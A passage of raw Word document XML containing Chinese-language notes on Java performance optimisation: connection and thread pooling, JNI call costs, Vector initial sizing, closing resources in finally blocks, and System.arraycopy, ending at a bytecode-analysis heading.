          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>避免过度地进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>控制台的写操作，降低字符串对象处理、文本格式化和输出带来的成本；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00F67FDD" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现数据库连接池，重用连接对象，而不是重复地打开和关闭连接；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用线程池（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>thread pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），避免不停地创建和删除线程对象，特别是在大量使用线程的时候；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F67FDD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异常的开销很大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java Native Interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JNI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用本机代码编写应用程序的一部分，特别是频繁使用的部分，并将之与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>链接，这样做通常是为了提高性能。不过，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">JVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与本机代码之间的通信通常很慢，因此，太多的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> JNI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用可能会降低性能。只要有可能就应该将本机操作集合在一起，以减少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> JNI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用的数量。使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> JNI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码本地处理异常，尽管有时不可避免，但会导致性能下降。在这种情况下，应该使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExceptionCheck() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数，因为与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExceptionOccurred() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相比较，它带来的计算开销更少一些。后者必须创建一个将引用的对象，以及一个本地引用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DA54D7" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="00DC002F" w:rsidRPr="002801AB">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/zhengsj/article/details/4462244</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00DB1680" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>避免在循环条件中使用复杂表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; vector.size();i++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00DB1680" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Vectors' </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> 'Hashtables'</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定义初始大小</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>扩充大小的时候需要重新创建一个更大的数组，将原原先数组中的内容复制过来，最后，原先的数组再被回收。可见</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>容量的扩大是一个颇费时间的事</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00214EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00214EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidRPr="00214EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>块中关闭数据库连接、</w:t>
      </w:r>
      <w:r w:rsidRPr="00214EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00214EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>流操作，以释放资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00214EC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00DB1680" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007736C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007736C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'System.arraycopy ()'</w:t>
      </w:r>
      <w:r w:rsidRPr="007736C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代替通过来循环复制数组</w:t>
      </w:r>
      <w:r w:rsidRPr="007736C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1680">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC002F" w:rsidRDefault="00DC002F" w:rsidP="00DC002F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
